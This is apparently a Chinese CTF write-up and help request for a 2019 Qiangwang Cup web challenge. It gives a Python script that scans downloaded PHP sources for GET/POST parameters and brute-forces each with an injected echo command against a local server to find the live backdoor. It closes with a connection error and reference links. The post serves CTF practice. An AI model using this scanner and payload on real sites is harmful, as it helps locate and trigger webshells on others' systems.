访问/www.tar.gz得到源代码
参考了别人的writeup,用wamp或者phpstudy搭建本地环境本地跑一下
基本原理是暴力破解,把每个文件里可能成为真正参数的参数都跑一下,直到发现那个可以访问的参数为止
那么如何测试?
对于get:构造?[参数]=echo "xxx"
对于post:构造data:{[参数]:=echo"xxx"}
import os
import re
import requests as r
files = os.listdir(r'C:\wamp\www\src')
method = re.compile(r"\$_[GEPOST]{3,4}\[.*\]")#$_[GEPOST]{3,4}[.*]
print(method)
flag = 0
for i in files:
p = 'C:\\wamp\\www\\src\\' + i
content = open(p, 'r', encoding='UTF-8').read()
#print(i)
#print(content)
print('*' * 20 + i + '*' * 20)
gepost = method.findall(content)
#print(gepost)
url = 'http://127.0.0.1/src/'
cmd = '=echo "cryscat";'
for j in gepost:
if 'GET' in j:
pdget = re.findall(r"'(.*)'", j)[0]
urlg = url + i + '?' + pdget + cmd
#print(urlg)
res = r.get(urlg)
print('------> ' + pdget)
if 'cryscat' in res.text:
print('Success!!! ------> ' + urlg)
flag = 1
break
if 'POST' in j:
pdpost = re.findall(r"'(.*)'", j)[0]
data = {
pdpost: cmd
}
urlp = url + i
#print(urlp)
res = r.post(urlp, data=data)
print('------> ' + pdpost)
if 'cryscat' in res.text:
print('Success!!! ------> ' + urlp + ' ' + data)
flag = 1
break
if flag == 1:
break
代码应该没问题,但是从报错
Traceback (most recent call last):
File "C:\Python36\lib\site-packages\urllib3\connection.py", line 141, in _new_conn
(self.host, self.port), self.timeout, **extra_kw)
File "C:\Python36\lib\site-packages\urllib3\util\connection.py", line 83, in create_connection
raise err
File "C:\Python36\lib\site-packages\urllib3\util\connection.py", line 73, in create_connection
sock.connect(sa)
OSError: [WinError 10048] 通常每个套接字地址(协议/网络地址/端口)只允许使用一次。
找了一圈也没解决,linux下没有测试,求大佬帮助。
参考文章:
https://hachp1.github.io/posts/Web%E5%AE%89%E5%85%A8/20190530-19qwb.html
https://blog.csdn.net/qq_26406447/article/details/90690453
https://mochazz.github.io/2019/05/27/2019%E5%BC%BA%E7%BD%91%E6%9D%AFWeb%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/
http://cdusec.happyhacking.top/?post=77
https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2
